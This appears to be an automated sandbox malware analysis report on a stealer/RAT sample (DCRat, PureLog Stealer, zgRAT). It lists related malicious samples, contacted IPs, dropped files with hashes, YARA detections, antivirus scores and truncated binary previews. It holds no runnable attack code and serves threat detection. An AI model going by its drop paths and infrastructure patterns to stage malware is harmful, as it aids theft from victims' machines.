                                                                                              • 149.154.167.220
                                                                                              JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              SecuriteInfo.com.Trojan.Inject5.10837.16335.2292.exeGet hashmaliciousAgentTeslaBrowse
                                                                                              • 149.154.167.220
                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.95.91
                                                                                              SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.26.0.5
                                                                                              SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                              • 104.20.23.46
                                                                                              SecuriteInfo.com.Win64.MalwareX-gen.31244.2279.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.26.1.5
                                                                                              SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.26.1.5
                                                                                              SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exeGet hashmaliciousXmrigBrowse
                                                                                              • 104.20.4.235
                                                                                              SecuriteInfo.com.Win64.CrypterX-gen.31361.18171.exeGet hashmaliciousUnknownBrowse
                                                                                              • 104.26.0.5
                                                                                              SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exeGet hashmaliciousLummaCBrowse
                                                                                              • 188.114.97.3
                                                                                              f6ffg1sZS2.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                              • 188.114.96.3
                                                                                              wo4POc0NG1.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                              • 172.67.170.64
                                                                                              GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 34.117.188.166
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              sheisverynicegirlwithgreatworkingskillwithgereatniceworkign.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              seemeherewithgreatthingsentiretimewithgreatthingsonhere.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              seethebestthingswhichgivennewthingswithmewesee.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              Factura-2410-CFDI.batGet hashmaliciousUnknownBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              SUNNY HONG VSL PARTICULARS.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              • 149.154.167.220
                                                                                              • 34.117.59.81
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\user\Desktop\CjxtNgkC.logd3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                T3xpD9ZaYu.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                  AvQTFKdsST.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                    0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                      VL1xZpPp1I.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                        4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                          oG6R4bo1Rd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                            BN57miasVe.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                              YhyZwI1Upd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with very long lines (716), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):716
                                                                                                                  Entropy (8bit):5.8658968580031
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:G5dud7+voXnrfWTPZlkDQaTOkQeAVZVbVTO0m5XAH/bqTx7nn3tfji/KRwVLqWk4:G7ud7+w2PZlkndQe2hO0mifOdj3pjUrv
                                                                                                                  MD5:E803FA0329975084BA5A550053407E7D
                                                                                                                  SHA1:3E5BC9B189A4316A4EBCA41835AC18351B6117DB
                                                                                                                  SHA-256:52B6BE2D088F3E5A617C6D14445AF33E035687625E07EBE0077BACAEB1276017
                                                                                                                  SHA-512:11F84E78071808D934D767C4399DC69C41DCB8D893D1AA5557805119EFB83A584AEE6E584E289E292872241E3B040C7BAACC3A4B36BE8E619B5DB1AD9EB99E3D
                                                                                                                  Malicious:false
                                                                                                                  Preview:TDbWL646bQnmsvclGwHldoh4WJh8RR9YLJ1KSNZI53DoTZdOpFmTJ8Oogg9CZ6oJQObj4RT3X9pjl2l7pSSLopPM4MowNXt8O3XE73UYwt6KSoDn4CWGodel9OprmgpAQqUsfgAw84Z5tF3PJA1LAmUvYwEsOmvPE63lUUIYBkHtDj24UZimpd9nWiTscRhWIK0wLS5y1dJafksy3JXzEIkk6QPvBa5uCvk2sFtCetvLUiIv0eyS4sR9kQ04CJxbhZYtAzFyaUUUXYQYIe5gln0TelScPzAU6To4KYvAZA1jX6mMAbwiOQ03jEPZhnjlUAYEtVNtt4HlvQ5h9GbxCcFpduUFJWdvaQOXihcpOCyTJPISIsabLwi24sk8AIkXbVKfCi8bnwjAnvgOmB6a6BjosVc06doFcb1xFmQjt8xZMhPILWW8LJbawfwqGHeJIdiL4sJ9vWr7NKcKGTpkHp4SAbBj0kdmeoRt9EOcNWNycdMlDmjxc3BcjPKcrjJL3Ecj2sLCEMXvcF0hPZgOAqJkmyKt3wvnNB5XAmtUahsQgQAdZnMRC5LM526DibIRbtiaKcgnqMxc83EWyqTQkdlR0sbIppv9YazxsjS7Hjk0HsOCxkP1H2r7IQkcAX7BaxDhDQnOYWJA3uKHdZUFZ41gs2oc9z6tljaTor8g6AdvtrDXGc9lC1lf5hyLmLPiZZYTU0cwaxIZ
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1930240
                                                                                                                  Entropy (8bit):7.544591098529135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3op1VaW6LOFlNM9TJozhpuCebFQQYJkvoAgNpjYsKyX0IS1/XF1vsnPVU82rRrcP:Y8WeJJUFAFQGoAgNCw0J1/XfkP/qcd
                                                                                                                  MD5:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  SHA1:DC5E3E8F14B9C6E6541947E55B195B8EFEBF22D7
                                                                                                                  SHA-256:1D85033F5C6BC5927CB48364F91D455F2263DFF76505D9849E5E4958CB6C173F
                                                                                                                  SHA-512:0E4C741BA7FD0E99E504606000E2190B6C9AFCB4349F80C6610DA2F974C8A466FD9C22DF000B65D46AF72C4970E826ED77533FE2307270A70A044B36AEB1814A
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A.g.................l..........N.... ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text...Tk... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B................0.......H..............................s........................................0..........(.... ........8........E....).......8...9...8$...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E....{...R...............8v...r...ps....z*....~....(R...~....(V... ....?.... ....~....{....:....& ....8....~....:.... ....~....{....9w...& ....8l......... ....~....{f...9R...& ....8G...~....(J... .... .... ....s....~....(N....
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xa2513613, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):0.4221847157873599
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
                                                                                                                  MD5:F15F3424F09C7D00107E622646C16377
                                                                                                                  SHA1:13B87E69F4AFA6E15210955A43E934667F1384EA
                                                                                                                  SHA-256:E075B8A57066A4616F3712E3B7F52ADD262478DC67DFC79BBAE5B2E93FCA8CBC
                                                                                                                  SHA-512:482162123D5743F1EEC64FC8080BF8CD3CF63494508AE5B3AD045006EA320585AA6C8CB11299DD786F9ED469CE98C658616CCFA400E9FF40903E06ADE80BD181
                                                                                                                  Malicious:false
                                                                                                                  Preview:.Q6.... .......A.......X\...;...{......................0.!..........{A.,....|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................d~.,....|..................)...,....|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1930240
                                                                                                                  Entropy (8bit):7.544591098529135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3op1VaW6LOFlNM9TJozhpuCebFQQYJkvoAgNpjYsKyX0IS1/XF1vsnPVU82rRrcP:Y8WeJJUFAFQGoAgNCw0J1/XfkP/qcd
                                                                                                                  MD5:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  SHA1:DC5E3E8F14B9C6E6541947E55B195B8EFEBF22D7
                                                                                                                  SHA-256:1D85033F5C6BC5927CB48364F91D455F2263DFF76505D9849E5E4958CB6C173F
                                                                                                                  SHA-512:0E4C741BA7FD0E99E504606000E2190B6C9AFCB4349F80C6610DA2F974C8A466FD9C22DF000B65D46AF72C4970E826ED77533FE2307270A70A044B36AEB1814A
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A.g.................l..........N.... ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text...Tk... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B................0.......H..............................s........................................0..........(.... ........8........E....).......8...9...8$...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E....{...R...............8v...r...ps....z*....~....(R...~....(V... ....?.... ....~....{....:....& ....8....~....:.... ....~....{....9w...& ....8l......... ....~....{f...9R...& ....8G...~....(J... .... .... ....s....~....(N....
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with very long lines (894), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):894
                                                                                                                  Entropy (8bit):5.9195193753885516
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:fAJkZTsCD0P6TT6VP3EubsbV9QIWVdOvWFXY1Ev3zFHE7:fAJk7DcgT0UqEVYhFyEFE7
                                                                                                                  MD5:6A3F8D2AAE32109565EF9997310C1D33
                                                                                                                  SHA1:46E96EE1F0C2DF597F85EF882FE014EDD40AC250
                                                                                                                  SHA-256:0F9CAADB8CFAABB9A7EFD9C60C55D75D77962250E5F01CB4E23ADD18B95C24FD
                                                                                                                  SHA-512:9C5B19E1F9BFF04F4A311D78C35832D3A767934217445A8F0F57B0A2224495FDFDB2E3BFD5CE3CA56073B1BC902B253F995C0032B3E0E25F548A0C2A3106170C
                                                                                                                  Malicious:false
                                                                                                                  Preview:JfWZLAYZLbJwI1ULMmohpeatRFkDoiZ1qjv3vte5ybbWDGtEJKTvPJOpEnIGaVunCSFiFbacHssNDEpKVf3eOnlhVGyHlYecqxTvBL9rt1ngaAmA77u5cQZZqiM9mT0tOQgPu4JKfMuW9FGVeyKoniAaY4Ec8AEaA4RKdWPCxkaPfCZlc1eyIMFqPG0z0qMfHUVFx52HjH0DIu5VfcAGfQSyyl4WfaLHX4ILqUxg9XPAVChfLeUXqFA1BhRMAflI6tpNmtpLpdHIBRcvDZLAFyaS4RJJClgevGEmWU3bzIsM820uEfIkTlDHSXTUjfIE7mW4N0ZtgtK6GOTCbZFhc5KKD6T8Ai2UAnOVf5hOGYEjaGBEER3KallCcM1Qgas7106c98gf20aD1ku64P4tpr3YBM3TDQspqGsjJjFFuXSjKiL1c4WQf8SJ6hawENclIvXu2KxVKy9RZUOdBB0J4bJrximmISBg5qaYKa8RHAGr9AumS7vDWTrrlq7UiKM1xcWt3zSkCjB3UcrwyATKg7Jm8txedot6xP3gnAsdoKAxRyWJ8Kgh1CU0TuuKCyHYzEFFjLIxSzfW6VUKXofSHMFv4DN3Phb0Cm7MsQjxBtOBg837ZkwYTzQn9ULf8PhuYpTUXIcGErQY7DP6KPdpuCgNVUMYFEzwLem0oijRIqTli2q6EOVsw29VIG9D5EB92eNdbYRmpLhEt5pdoQT0sG9SeQsiigVDoTtDoNfq6tCkV5mNbgZpuKRve48KqtDJzdZZMlyavm39EZ7infHCGqSeC7itOUANp2u1fNBzr83IQRrF7ZgKlADIK5WOCEMamqTLoFDaeRUIwKNvQdwyyzlpzlrk1wwnwdgk7ga2WGqTp5W9rk8jSYmwEoVCXd
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1930240
                                                                                                                  Entropy (8bit):7.544591098529135
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3op1VaW6LOFlNM9TJozhpuCebFQQYJkvoAgNpjYsKyX0IS1/XF1vsnPVU82rRrcP:Y8WeJJUFAFQGoAgNCw0J1/XfkP/qcd
                                                                                                                  MD5:4F593957FF5A8313DC52738F85592CBA
                                                                                                                  SHA1:DC5E3E8F14B9C6E6541947E55B195B8EFEBF22D7
                                                                                                                  SHA-256:1D85033F5C6BC5927CB48364F91D455F2263DFF76505D9849E5E4958CB6C173F
                                                                                                                  SHA-512:0E4C741BA7FD0E99E504606000E2190B6C9AFCB4349F80C6610DA2F974C8A466FD9C22DF000B65D46AF72C4970E826ED77533FE2307270A70A044B36AEB1814A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A.g.................l..........N.... ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text...Tk... ...l.................. ..`.rsrc... ............n..............@....reloc...............r..............@..B................0.......H..............................s........................................0..........(.... ........8........E....).......8...9...8$...(.... ....~....{....:....& ....8....(.... ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E....{...R...............8v...r...ps....z*....~....(R...~....(V... ....?.... ....~....{....:....& ....8....~....:.... ....~....{....9w...& ....8l......... ....~....{f...9R...& ....8G...~....(J... .... .... ....s....~....(N....
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with very long lines (513), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):513
                                                                                                                  Entropy (8bit):5.87193213112321
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:D1WBzbpYXGvz2nPjuEzEJ9pmdVg03811eSStMF1WR15CJx:ZGzZaPjpzw98dVg038botQ1k5Ax
                                                                                                                  MD5:24B7CEB7F8052BB48849160A33B12DCF
                                                                                                                  SHA1:9CD5407A1BA1DFEED3BB06C19E3B21F318FE0CF0
                                                                                                                  SHA-256:481616F1988DB8CB447197587046C238F5432A9807219F2818003E9808C3D4EF
                                                                                                                  SHA-512:23B3FEC982EBB3B15307CF6286D9D2DAF6ADFE7DF48A54FFE678CDA7C059C4C414B9809B3B04A8BAC4812738F3CAB26303A65E640462E3DF6DD2CEFAA45A6D3C
                                                                                                                  Malicious:false
                                                                                                                  Preview:Qnhvw9UlyQBKtFEcfSuZWtD0DBlGkT7rb9L7JgC0qMGFSkx25LEAdgJgkqrvXNBeSTtt3GS8P3sJm7idNsKZO6O50oXcyRccLlw91D8y2FvjxA4mIOhpDmQVEx3Pt0K8bQ7BLjmJuVgJLoIzuvTjtxZjVa4DKsFC5xIgD2bjmY4rFHKapDf8gkOo0Xpuoi9BQeNYglw1Tu7V2reOQeXGNHfUidppNr4DY2bl3w3ERoown3vJ3adKK3yI83zD5Hnm0369P2VelTzjdtrpsgvwNu2fETmA60IKAB6t6w3AF9j1DOpPLKUYV1ZFAb46PVhuKpjbx7t5nvqNKBbznXywftyJm0se16vubyqYpObObYvkKL589FT1gvPb0Zy7OOEqA6wWVCKZ6kUG8O8b4uewn3NpiOiPZd9MUFkOYjn74356aJdlbXCetSDGsGxGe49ckIw3ouCVHh1t7QPZv7yCaecBBdfSvgdA3cWSXk7qVrXMbTJb1YUhF7BGpu1LOtkkE
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):847
                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                  Process:C:\Program Files\Windows NT\Accessories\en-GB\Idle.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):847
                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                  Process:C:\webHostnet\MsPortSavesruntime.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2041
                                                                                                                  Entropy (8bit):5.374034001672589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNp51qHGIs0HKD:iqbYqGSI6oPtzHeqKktVTqZ4vtp5wmjB
                                                                                                                  MD5:6594A52AA7EC9BF342D53EF8C5C3F92F
                                                                                                                  SHA1:E4439EF0FB0002B8DAD1D7FC4BA598FEE910F4DE
                                                                                                                  SHA-256:1BCDE01217E85B5A7304A3DF69926B2B046B11826E3A70E78D220B063DB5EE2B
                                                                                                                  SHA-512:29B10494189EFC74EC781413CA1954053EA044EFA879C22EE1FC36D5CD80438F36EA87B7C9C8E0BC5216F13F2DDB893B37E5494A61A8A7DD830A5810A2016A84
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:NlllulJnp/p:NllU
                                                                                                                  MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                                  SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                                  SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                                  SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e.................................X..............@..........
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):28672
                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  Process:C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
